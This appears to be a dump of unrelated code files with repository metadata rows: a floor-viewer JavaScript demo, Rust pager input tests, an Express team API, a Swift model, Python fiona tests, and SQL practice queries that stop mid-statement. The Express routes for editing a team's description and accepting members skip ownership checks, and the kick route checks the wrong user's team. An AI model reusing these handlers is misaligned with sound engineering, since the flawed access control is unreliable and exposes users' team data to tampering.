* @param query An object containing the query parameters.
*/
/**
 * Build the access headers for the SDK from the parsed query parameters.
 * Throws when no token is present in the query.
 *
 * @param {Object} query - parsed query parameters.
 * @returns {Object} headers containing the x-access-token entry.
 */
function getUserCredentials(query) {
  if (!query.token) {
    throw Error('missing user credentials, provide either [user, pass] or [token] queries.');
  }
  return {
    'x-access-token': query.token,
  };
}
/**
* Entry point for the program to execute once the DOM is loaded.
*/
function main() {
  // Build the FloorViewer SDK from the page's query parameters and wire up
  // the demo controls (ping, select, marker toggles) once it is ready.
  var query = getQueryParams();
  var sdk = new FloorViewerSDK({
    siteUrl: query.siteUrl,
    accessHeaders: getUserCredentials(query),
    floorId: query.floorId,
    container: 'fv-container',
  });
  sdk.onReady().then(function () {
    sdk.getVersion().then(function (version) {
      console.log('Using VERSION:', version);
    });
    // Record the ids assigned by the viewer so the checkbox handlers below
    // can show/hide individual markers later.
    sdk.addMarkers(markers).then(function (ids) {
      _.each(ids, function(id, index) {
        markers[index].id = id;
      });
    });
  });
  // NOTE: `markers` is used in the onReady callback above but declared
  // here; `var` hoisting plus the asynchronous callback (which runs only
  // after main() has finished) make this safe.
  var markers = [
    {
      icon: 'home',
      markerColor: 'red',
      latlng: [-3.23046875, 4.28125]
    },
    {
      icon: 'pizza',
      markerColor: 'blue',
      latlng: [-4.8203125, 1.265625]
    }
  ];
  // Show info about whichever room the user clicks in the #map-info panel.
  sdk.onRoomClick(function (event) {
    console.log('latlng: ', event.latlng);
    var room = event.room;
    var div = document.getElementById('map-info');
    if (!room) {
      div.innerHTML = 'No room was clicked ...';
      return;
    }
    var roomInfo = {
      id: room.id,
      name: room.name,
      users: room.users
    };
    var content = '<strong>Room Info</strong>';
    content += '<pre>' + JSON.stringify(roomInfo, null, 2) + '</pre>';
    div.innerHTML = content;
  });
  // Surface viewer errors in the #map-errors panel for the demo.
  sdk.onFvError(function (event) {
    var div = document.getElementById('map-errors');
    var content = '<pre>' + JSON.stringify(event, null, 2) + '</pre>';
    div.innerHTML = content;
  });
  // Handlers below are attached to the module-level `ping`, `select` and
  // `setMarkers` objects so the page's inline onclick attributes can reach
  // them; each reads its input element and calls the matching SDK method.
  ping.roomById = function () {
    var roomId = document.getElementById('input-room-id').value;
    if (roomId) {
      sdk.pingByRoomId(roomId);
    }
  };
  ping.roomByName = function () {
    var roomName = document.getElementById('input-room-name').value;
    if (roomName) {
      sdk.pingByRoomName(roomName, {
        duration: 10,
        color: [255, 0, 0],
      });
    }
  };
  select.roomById = function () {
    var roomId = document.getElementById('select-room-id').value;
    if (roomId) {
      sdk.selectRoomById(roomId);
    } else {
      // An empty field clears the current selection.
      sdk.unselectRooms();
    }
  };
  select.roomByName = function () {
    var roomName = document.getElementById('select-room-name').value;
    if (roomName) {
      sdk.selectRoomByName(roomName);
    } else {
      sdk.unselectRooms();
    }
  };
  setMarkers.home = function () {
    var checkbox = document.getElementById('home-checkbox');
    if (checkbox.checked) {
      sdk.showMarkers([markers[0].id]);
    } else {
      sdk.hideMarkers([markers[0].id]);
    }
  };
  setMarkers.pizza = function () {
    var checkbox = document.getElementById('pizza-checkbox');
    if (checkbox.checked) {
      sdk.showMarkers([markers[1].id]);
    } else {
      sdk.hideMarkers([markers[1].id]);
    }
  };
}
document.addEventListener('DOMContentLoaded', main);
| 24.584416 | 97 | 0.60803 | 3.296875 |
7c6f46a5743f6c94a9b6c85c98d454bc3531498b | 11,392 | rs | Rust | src/input/tests.rs | iandwelker/minus | f0498f63598599c270b2340864fb8324ea6ec719 | [
"Apache-2.0",
"MIT"
] | 179 | 2020-11-27T17:49:59.000Z | 2022-03-28T05:33:25.000Z | src/input/tests.rs | iandwelker/minus | f0498f63598599c270b2340864fb8324ea6ec719 | [
"Apache-2.0",
"MIT"
] | 54 | 2020-12-03T20:02:09.000Z | 2022-03-31T10:37:51.000Z | src/input/tests.rs | iandwelker/minus | f0498f63598599c270b2340864fb8324ea6ec719 | [
"Apache-2.0",
"MIT"
] | 14 | 2020-12-04T13:30:21.000Z | 2022-03-31T09:59:25.000Z | #[cfg(feature = "search")]
use crate::SearchMode;
use crate::{input::InputEvent, LineNumbers, Pager};
use crossterm::event::{Event, KeyCode, KeyEvent, KeyModifiers, MouseEvent, MouseEventKind};
// Transparent test helper that classifies `ev` against the pager's current
// state, smoothing over incompatibility issues between versions.
// TODO: Remove this later in favour of how handle_event should actually be called
fn handle_input(ev: Event, p: &Pager) -> Option<InputEvent> {
    p.input_classifier.classify_input(
        ev,
        p.upper_mark,
        #[cfg(feature = "search")]
        p.search_mode,
        p.line_numbers,
        // `message` is deliberately passed as `false` here; the
        // prompt-message path is covered separately by test_restore_prompt.
        false,
        p.rows,
    )
}
// Keyboard navigation
#[test]
#[allow(clippy::too_many_lines)]
fn test_kb_nav() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Down,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark + 1)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Up,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark - 1)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('g'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(0)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::PageUp,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
// rows is 5, therefore upper_mark = upper_mark - rows -1
Some(InputEvent::UpdateUpperMark(8)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('g'),
modifiers: KeyModifiers::SHIFT,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('G'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('G'),
modifiers: KeyModifiers::SHIFT,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::PageDown,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
// rows is 5, therefore upper_mark = upper_mark - rows -1
Some(InputEvent::UpdateUpperMark(16)),
handle_input(ev, &pager)
);
}
{
// Half page down
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('d'),
modifiers: KeyModifiers::CONTROL,
});
// Rows is 5 and upper_mark is at 12 so result should be 14
assert_eq!(
Some(InputEvent::UpdateUpperMark(14)),
handle_input(ev, &pager)
);
}
{
// Half page up
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('u'),
modifiers: KeyModifiers::CONTROL,
});
// Rows is 5 and upper_mark is at 12 so result should be 10
assert_eq!(
Some(InputEvent::UpdateUpperMark(10)),
handle_input(ev, &pager)
);
}
{
// Space for page down
let ev = Event::Key(KeyEvent {
code: KeyCode::Char(' '),
modifiers: KeyModifiers::NONE,
});
// rows is 5, therefore upper_mark = upper_mark - rows -1
assert_eq!(
Some(InputEvent::UpdateUpperMark(16)),
handle_input(ev, &pager)
);
}
{
// Enter key for one line down when no message on prompt
let ev = Event::Key(KeyEvent {
code: KeyCode::Enter,
modifiers: KeyModifiers::NONE,
});
// therefore upper_mark += 1
assert_eq!(
Some(InputEvent::UpdateUpperMark(13)),
handle_input(ev, &pager)
);
}
}
#[test]
fn test_restore_prompt() {
    let pager = Pager::new().unwrap();
    {
        // Enter pressed while a message is shown on the prompt
        // (the `message` argument passed below is `true`).
        let ev = Event::Key(KeyEvent {
            code: KeyCode::Enter,
            modifiers: KeyModifiers::NONE,
        });
        // Expect the prompt to be restored instead of scrolling a line.
        assert_eq!(
            Some(InputEvent::RestorePrompt),
            pager.input_classifier.classify_input(
                ev,
                pager.upper_mark,
                #[cfg(feature = "search")]
                SearchMode::Unknown,
                LineNumbers::Disabled,
                true,
                pager.rows
            )
        );
    }
}
#[test]
fn test_mouse_nav() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Mouse(MouseEvent {
kind: MouseEventKind::ScrollDown,
row: 0,
column: 0,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark + 5)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Mouse(MouseEvent {
kind: MouseEventKind::ScrollUp,
row: 0,
column: 0,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark - 5)),
handle_input(ev, &pager)
);
}
}
#[test]
fn test_saturation() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Down,
modifiers: KeyModifiers::NONE,
});
// Pager for local use
let mut pager = Pager::new().unwrap();
pager.upper_mark = usize::MAX;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Up,
modifiers: KeyModifiers::NONE,
});
// Pager for local use
let mut pager = Pager::new().unwrap();
pager.upper_mark = usize::MIN;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MIN)),
handle_input(ev, &pager)
);
}
}
#[test]
fn test_misc_events() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Resize(42, 35);
assert_eq!(
Some(InputEvent::UpdateTermArea(42, 35)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('l'),
modifiers: KeyModifiers::CONTROL,
});
assert_eq!(
Some(InputEvent::UpdateLineNumber(!pager.line_numbers)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('q'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(Some(InputEvent::Exit), handle_input(ev, &pager));
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('c'),
modifiers: KeyModifiers::CONTROL,
});
assert_eq!(Some(InputEvent::Exit), handle_input(ev, &pager));
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('a'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(None, handle_input(ev, &pager));
}
}
#[test]
#[allow(clippy::too_many_lines)]
#[cfg(feature = "search")]
fn test_search_bindings() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('/'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::Search(SearchMode::Forward)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('?'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::Search(SearchMode::Reverse)),
handle_input(ev, &pager)
);
}
{
// NextMatch and PrevMatch forward search
let next_event = Event::Key(KeyEvent {
code: KeyCode::Char('n'),
modifiers: KeyModifiers::NONE,
});
let prev_event = Event::Key(KeyEvent {
code: KeyCode::Char('p'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
pager.input_classifier.classify_input(
next_event,
pager.upper_mark,
SearchMode::Forward,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::NextMatch)
);
assert_eq!(
pager.input_classifier.classify_input(
prev_event,
pager.upper_mark,
SearchMode::Forward,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::PrevMatch)
);
}
{
// NextMatch and PrevMatch reverse search
let next_event = Event::Key(KeyEvent {
code: KeyCode::Char('n'),
modifiers: KeyModifiers::NONE,
});
let prev_event = Event::Key(KeyEvent {
code: KeyCode::Char('p'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
pager.input_classifier.classify_input(
next_event,
pager.upper_mark,
SearchMode::Reverse,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::PrevMatch)
);
assert_eq!(
pager.input_classifier.classify_input(
prev_event,
pager.upper_mark,
SearchMode::Reverse,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::NextMatch)
);
}
}
| 26.931442 | 91 | 0.509831 | 3.203125 |
9c383efbdd1fb5892c9f9ac60d7dbbe07b5b6dff | 10,009 | js | JavaScript | api/team.js | HackSC/apply-2020 | a240dfd0599dc0b66ba3a77ed4dde806fb6fe009 | [
"MIT"
] | 8 | 2019-09-25T16:20:03.000Z | 2021-02-20T08:53:11.000Z | api/team.js | HackSC/apply-2020 | a240dfd0599dc0b66ba3a77ed4dde806fb6fe009 | [
"MIT"
] | 321 | 2019-09-26T19:07:59.000Z | 2022-02-17T20:47:45.000Z | api/team.js | HackSC/apply-2020 | a240dfd0599dc0b66ba3a77ed4dde806fb6fe009 | [
"MIT"
] | 2 | 2019-09-25T23:27:26.000Z | 2020-02-04T19:59:18.000Z | const express = require("express");
const models = require("./models");
const utils = require("./utils");
const router = express.Router();
router.use(utils.authMiddleware);
router.use(utils.preprocessRequest);
// GET /api/team
// - If a hacker is on a team, get that team info
router.get("/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
let team = await hackerProfile.getTeam({
include: [
{
model: models.HackerProfile,
as: "members",
attributes: ["firstName", "lastName", "status", "email", "userId"],
},
],
});
if (team) {
return res.json({ team });
} else {
return res.json({
message: "User does not currently belong to a team",
});
}
});
// GET /api/team/:code
// - If provided a team code, retrieve it
router.get("/:code", async (req, res) => {
// Try to find a team with the provided code
const team = await models.Team.findOne({
where: { teamCode: req.params.code || "" },
});
if (!team) {
return res
.status(400)
.json({ message: "Could not find a team with that code" });
} else {
return res.json({ team });
}
});
// POST /api/team
// - If a hacker is not on a team, create a team
router.post("/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
let team = await hackerProfile.getTeam();
if (team) {
return res.status(500).json({ message: "User already belongs on a team" });
}
let generatedCode = Math.random().toString(36).slice(4, 8).toUpperCase();
while (
await models.Team.findOne({
where: { teamCode: generatedCode },
})
) {
// Regenerate code
generatedCode = Math.random().toString(36).slice(4, 8).toUpperCase();
}
team = await models.Team.create({
name: req.body.name,
teamCode: generatedCode,
ownerId: req.user.id,
description: "",
});
await hackerProfile.update({
teamId: team.id,
lookingForTeam: false,
});
return res.json({
team,
});
});
// DELETE /api/team
// - Attempts to delete a user's current team
router.delete("/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't join a team if you're already on one!
let team = await hackerProfile.getTeam();
if (!team) {
return res.status(400).json({ message: "User does not belong on a team" });
}
if (team.ownerId === req.user.id) {
// Allow deletion
await models.HackerProfile.update(
{ teamId: null },
{ where: { teamId: team.id } }
);
await models.PendingTeammateRequests.destroy({
where: {
teamId: team.id,
},
});
await team.destroy();
return res.status(200).json({ message: "Team successfully deleted" });
} else {
return res
.status(400)
.json({ message: "You cannot delete a team you don't own" });
}
});
// POST /api/team/join/:code
// - If a hacker is not on a team, attempt to join a team
router.post("/join/:code", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't join a team if you're already on one!
let team = await hackerProfile.getTeam();
if (team) {
return res.status(400).json({ message: "User already belongs on a team" });
}
// Try to find a team with the provided code
team = await models.Team.findOne({
where: { teamCode: req.params.code || "" },
});
if (!team) {
return res
.status(400)
.json({ message: "Could not find a team with that code" });
}
// See if there is still space in the team
const teamMembers = await team.getMembers();
if (teamMembers.length + 1 > 4) {
return res.status(400).json({ message: "This team is full!" });
}
// If we're still here, we can join the team :)
await hackerProfile.setTeam(team);
await models.PendingTeammateRequests.destroy({
where: {
hackerProfileId: req.user.id,
},
});
// if full, update
if (teamMembers.length == 3) {
await models.PendingTeammateRequests.destroy({
where: {
teamId: team.id,
},
});
await team.update({
lookingForTeammates: false,
});
}
return res.status(200).json({
message: "Successfully joined team",
});
});
// POST /api/team/kick/:userid
// - If a hacker is not on a team, attempt to join a team
router.post("/kick/:userid", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't kick someone else from a team if you are not on a team!
let team = await hackerProfile.getTeam();
if (!team) {
return res.status(400).json({ message: "User does not belong on a team" });
}
if (team.ownerId === req.params.userid) {
return res.status(400).json({
message: `Not allowed to kick yourself. Delete the team instead.`,
});
}
if (team.ownerId === req.user.id) {
// Allow kicking
const kickProfile = await models.HackerProfile.findOne({
where: { userId: req.params.userid },
});
let kicked_team = await hackerProfile.getTeam();
if (kicked_team.teamCode == team.teamCode) {
// In the same team, we can kick
await kickProfile.setTeam(null);
return res
.status(200)
.json({ message: `User ${req.params.userid} successfully kicked.` });
}
}
return res.status(400).json({
message: `Could not kick member with userid ${req.params.userid}.`,
});
});
// POST /api/team/kick/:userid
// - If a hacker is not on a team, attempt to join a team
router.post("/kick/:userid", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't kick someone else from a team if you are not on a team!
let team = await hackerProfile.getTeam();
if (!team) {
return res.status(400).json({ message: "User does not belong on a team" });
}
if (team.ownerId === req.params.userid) {
return res.status(400).json({
message: `Not allowed to kick yourself. Delete the team instead.`,
});
}
if (team.ownerId === req.user.id) {
// Allow kicking
const kickProfile = await models.HackerProfile.findOne({
where: { userId: req.params.userid },
});
let kicked_team = await hackerProfile.getTeam();
if (kicked_team.teamCode == team.teamCode) {
// In the same team, we can kick
await kickProfile.setTeam(null);
return res
.status(200)
.json({ message: `User ${req.params.userid} successfully kicked.` });
}
}
return res.status(400).json({
message: `Could not kick member with userid ${req.params.userid}.`,
});
});
// POST /api/team/leave
// - If a hacker is on a team, attempt to leave that team
router.post("/leave", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't leave a team if you're not in one!
let team = await hackerProfile.getTeam();
if (!team) {
return res
.status(400)
.json({ message: "User does not currently belong to a team" });
}
// Can't leave a team if you own it
if (team.ownerId === req.user.id) {
return res
.status(400)
.json({ message: "You cannot leave this team, you created it" });
}
// If we're still here, we can leave the team :)
await hackerProfile.update({
teamId: null,
});
return res.status(200).json({
message: "Successfully left team",
});
});
// Change visibility
router.put("/visibility", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
const team = await hackerProfile.getTeam({
include: [
{
model: models.HackerProfile,
attributes: ["firstName", "lastName", "status", "email", "userId"],
},
],
});
const lookingForTeammates = team.lookingForTeammates;
await models.Team.update(
{ lookingForTeammates: !lookingForTeammates },
{
where: {
id: team.id,
},
}
);
return res.send();
});
// Change description
router.put("/description", async (req, res) => {
await models.Team.update(
{ description: req.body.text },
{
where: {
teamCode: req.body.teamCode,
},
}
);
return res.send();
});
// POST /api/team/accept/
// - If a hacker is not on a team, attempt to join a team
router.post("/accept/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.body.hackerId },
});
// Can't join a team if you're already on one!
if (hackerProfile.teamId) {
return res.status(400).json({ message: "User already belongs on a team" });
}
// Try to find a team with the provided code
const team = await models.Team.findOne({
where: { teamCode: req.body.teamCode || "" },
});
if (!team) {
return res
.status(400)
.json({ message: "Could not find a team with that code" });
}
// See if there is still space in the team
const teamMembers = await team.getMembers();
if (teamMembers.length + 1 > 4) {
return res.status(400).json({ message: "This team is full!" });
}
// If we're still here, we can join the team :)
await hackerProfile.setTeam(team);
await hackerProfile.update({
lookingForTeam: false,
});
await models.PendingTeammateRequests.destroy({
where: {
hackerProfileId: req.body.hackerId,
},
});
// if full, update
if (teamMembers.length == 3) {
await models.PendingTeammateRequests.destroy({
where: {
teamId: team.id,
},
});
await team.update({
lookingForTeammates: false,
});
}
return res.status(200).json({
message: "Successfully joined team",
});
});
module.exports = router;
| 25.0225 | 79 | 0.613648 | 3.140625 |
eebf30247aff0a5af676c97ce77741c02458cf70 | 1,055 | swift | Swift | Source/Definitions/RuleInfo.swift | tylerlong/ringcentral-swift-client-back | 39efd3c4989c560ff35a4d126bc81ef767f2d232 | [
"MIT"
] | 1 | 2017-08-23T23:20:29.000Z | 2017-08-23T23:20:29.000Z | Source/Definitions/RuleInfo.swift | tylerlong/ringcentral-swift-client-back | 39efd3c4989c560ff35a4d126bc81ef767f2d232 | [
"MIT"
] | null | null | null | Source/Definitions/RuleInfo.swift | tylerlong/ringcentral-swift-client-back | 39efd3c4989c560ff35a4d126bc81ef767f2d232 | [
"MIT"
] | null | null | null | import Foundation
import ObjectMapper
import Alamofire
open class RuleInfo: Mappable {
// Forwarding number (or group) ordinal
open var `index`: Int?
// Number of rings for a forwarding number (or group)
open var `ringCount`: Int?
// Forwarding number (or group) data
open var `forwardingNumbers`: [RuleInfo_ForwardingNumberInfo]?
public init() {
}
convenience public init(index: Int? = nil, ringCount: Int? = nil, forwardingNumbers: [RuleInfo_ForwardingNumberInfo]? = nil) {
self.init()
self.index = `index`
self.ringCount = `ringCount`
self.forwardingNumbers = `forwardingNumbers`
}
required public init?(map: Map) {
}
open func mapping(map: Map) {
`index` <- map["index"]
`ringCount` <- map["ringCount"]
`forwardingNumbers` <- map["forwardingNumbers"]
}
open func toParameters() -> Parameters {
var result = [String: String]()
result["json-string"] = self.toJSONString(prettyPrint: false)!
return result
}
}
| 32.96875 | 130 | 0.637915 | 3.03125 |
0c90583bb1e8038246e08d81681f08ae3de8075d | 3,738 | py | Python | tests/test_remove.py | sanjaymsh/Fiona | 7be39538f7317efec3e60b8dc722af7e8fea6d52 | [
"BSD-3-Clause"
] | 1 | 2020-03-06T21:13:54.000Z | 2020-03-06T21:13:54.000Z | tests/test_remove.py | sanjaymsh/Fiona | 7be39538f7317efec3e60b8dc722af7e8fea6d52 | [
"BSD-3-Clause"
] | null | null | null | tests/test_remove.py | sanjaymsh/Fiona | 7be39538f7317efec3e60b8dc722af7e8fea6d52 | [
"BSD-3-Clause"
] | 1 | 2021-04-12T05:38:58.000Z | 2021-04-12T05:38:58.000Z | import logging
import sys
import os
import itertools
from .conftest import requires_gpkg
import pytest
import fiona
from fiona.errors import DatasetDeleteError
def create_sample_data(filename, driver, **extra_meta):
meta = {
'driver': driver,
'schema': {
'geometry': 'Point',
'properties': {}
}
}
meta.update(extra_meta)
with fiona.open(filename, 'w', **meta) as dst:
dst.write({
'geometry': {
'type': 'Point',
'coordinates': (0, 0),
},
'properties': {},
})
assert(os.path.exists(filename))
drivers = ["ESRI Shapefile", "GeoJSON"]
kinds = ["path", "collection"]
specify_drivers = [True, False]
test_data = itertools.product(drivers, kinds, specify_drivers)
@pytest.mark.parametrize("driver, kind, specify_driver", test_data)
def test_remove(tmpdir, kind, driver, specify_driver):
"""Test various dataset removal operations"""
extension = {"ESRI Shapefile": "shp", "GeoJSON": "json"}[driver]
filename = "delete_me.{extension}".format(extension=extension)
output_filename = str(tmpdir.join(filename))
create_sample_data(output_filename, driver=driver)
if kind == "collection":
to_delete = fiona.open(output_filename, "r")
else:
to_delete = output_filename
assert os.path.exists(output_filename)
if specify_driver:
fiona.remove(to_delete, driver=driver)
else:
fiona.remove(to_delete)
assert not os.path.exists(output_filename)
def test_remove_nonexistent(tmpdir):
"""Attempting to remove a file that does not exist results in an IOError"""
filename = str(tmpdir.join("does_not_exist.shp"))
assert not os.path.exists(filename)
with pytest.raises(IOError):
fiona.remove(filename)
@requires_gpkg
def test_remove_layer(tmpdir):
filename = str(tmpdir.join("a_filename.gpkg"))
create_sample_data(filename, "GPKG", layer="layer1")
create_sample_data(filename, "GPKG", layer="layer2")
create_sample_data(filename, "GPKG", layer="layer3")
create_sample_data(filename, "GPKG", layer="layer4")
assert fiona.listlayers(filename) == ["layer1", "layer2", "layer3", "layer4"]
# remove by index
fiona.remove(filename, layer=2)
assert fiona.listlayers(filename) == ["layer1", "layer2", "layer4"]
# remove by name
fiona.remove(filename, layer="layer2")
assert fiona.listlayers(filename) == ["layer1", "layer4"]
# remove by negative index
fiona.remove(filename, layer=-1)
assert fiona.listlayers(filename) == ["layer1"]
# invalid layer name
with pytest.raises(ValueError):
fiona.remove(filename, layer="invalid_layer_name")
# invalid layer index
with pytest.raises(DatasetDeleteError):
fiona.remove(filename, layer=999)
def test_remove_layer_shapefile(tmpdir):
"""Removal of layer in shapefile actually deletes the datasource"""
filename = str(tmpdir.join("a_filename.shp"))
create_sample_data(filename, "ESRI Shapefile")
fiona.remove(filename, layer=0)
assert not os.path.exists(filename)
def test_remove_layer_geojson(tmpdir):
"""Removal of layers is not supported by GeoJSON driver
The reason for failure is slightly different between GDAL 2.2+ and < 2.2.
With < 2.2 the datasource will fail to open in write mode (IOError), while
with 2.2+ the datasource will open but the removal operation will fail (not
supported).
"""
filename = str(tmpdir.join("a_filename.geojson"))
create_sample_data(filename, "GeoJSON")
with pytest.raises((RuntimeError, IOError)):
fiona.remove(filename, layer=0)
assert os.path.exists(filename)
| 31.677966 | 81 | 0.677368 | 3.109375 |
c527ea84b5a4b47622dc40d44bd32c77b01e9b4f | 3,887 | sql | SQL | mySQL_test.sql | sadafmehds/mySQL_test | 84e02cb07d80d6fad4c9dac28cd2ca0c2befc41c | [
"MIT"
] | null | null | null | mySQL_test.sql | sadafmehds/mySQL_test | 84e02cb07d80d6fad4c9dac28cd2ca0c2befc41c | [
"MIT"
] | null | null | null | mySQL_test.sql | sadafmehds/mySQL_test | 84e02cb07d80d6fad4c9dac28cd2ca0c2befc41c | [
"MIT"
] | null | null | null | USE sakila;
-- 1a). Display first names and last names from table actor
SELECT first_name, last_name
FROM actor;
-- 1b).
SELECT CONCAT(first_name, ' ', last_name) AS 'Actor Name' FROM actor;
-- Practice: Testing going to lower case from upper case
SET SQL_SAFE_UPDATES=0;
UPDATE actor
SET first_name = LOWER(first_name)
WHERE LOWER(first_name) = first_name;
-- 2a)
SELECT*FROM actor WHERE first_name='JOE';
-- 2b)
SELECT*FROM actor WHERE last_name LIKE '%GEN%';
-- 2c) reorder columns and select from one column the cells that contain 'LI'
ALTER TABLE actor MODIFY COLUMN first_name VARCHAR(100) AFTER last_name;
SELECT*FROM actor WHERE last_name LIKE '%LI%';
SELECT*FROM country;
-- 2d)
SELECT country_id,country
FROM country
WHERE country IN ('Afghanistan','Bangladesh','China');
-- 3a)
ALTER TABLE actor ADD COLUMN middle_name VARCHAR(100) AFTER last_name;
SELECT*FROM actor;
-- 3b).
ALTER TABLE actor MODIFY COLUMN middle_name BLOB;
-- 3c).
ALTER TABLE actor DROP COLUMN middle_name;
SELECT*FROM actor;
-- 4a) Count how many of each last name there is in the last_name column
SELECT last_name, COUNT(*)
FROM actor
GROUP BY last_name;
-- 4b).
SELECT last_name, COUNT(*)
FROM actor
GROUP BY last_name
HAVING COUNT(*)>1;
-- 4c).
UPDATE actor
SET first_name='HARPO'
WHERE first_name='GROUCHO';
-- 4d)
UPDATE actor
SET first_name='GROUCHO'
WHERE first_name='HARPO';
-- 5a).
SHOW CREATE TABLE address;
-- CREATE TABLE `address` (\n `address_id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,\n `address` varchar(50) NOT NULL,\n `address2` varchar(50) DEFAULT NULL,\n `district` varchar(20) NOT NULL,\n `city_id` smallint(5) unsigned NOT NULL,\n `postal_code` varchar(10) DEFAULT NULL,\n `phone` varchar(20) NOT NULL,\n `location` geometry NOT NULL,\n `last_update` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n PRIMARY KEY (`address_id`),\n KEY `idx_fk_city_id` (`city_id`),\n SPATIAL KEY `idx_location` (`location`),\n CONSTRAINT `fk_address_city` FOREIGN KEY (`city_id`) REFERENCES `city` (`city_id`) ON UPDATE CASCADE\n) ENGINE=InnoDB AUTO_INCREMENT=606 DEFAULT CHARSET=utf8
-- 6a).
-- address: address id, address, district, city id, postal code, phone, location, last update
-- staff: staff id, first name, last name, address id, picture, email, store id, actuve, username, password, last update
SELECT first_name, last_name, address
FROM address a
JOIN staff s
ON (s.address_id=a.address_id);
-- OR
SELECT first_name, last_name, address
FROM staff
JOIN address
USING (address_id);
SELECT first_name, last_name, address
FROM staff
JOIN address
USING (address_id);
-- 6b). ask about join method later, used a diff way
select*from staff;
select*from payment;
-- payment: payment_id,cutomer_id,amount, rental_id, staff_id, payment_date, last_update
-- staff: staff id, first name, last name, address id, picture, email, store id, actuve, username, password, last update
select year(payment_date) as y, month(payment_date) as m, staff_id as staff_no, sum(amount) as p
from payment
group by year(payment_date), month(payment_date), staff_no;
-- 6c). Get counts of actors in each movie via inner merge
select*from film; -- film_id,title,description,
select*from film_actor; -- actor_id,film_id
select film.title,count(actor_id)
from film
inner join film_actor on film.film_id=film_actor.film_id
GROUP by title;
-- 6d).
select*from inventory;
select*from film;
select count(*) as copy_number
from inventory
where film_id in
(
select film_id
from film
where title='Hunchback Impossible');
-- 6e).
-- 6e).
select*from payment; -- customer_id,payment_id, staff_id, amount
select*from customer; -- customer_id,store_id, first_name, last_name, email
select first_name, last_name,sum(amount)
from payment p
join customer c
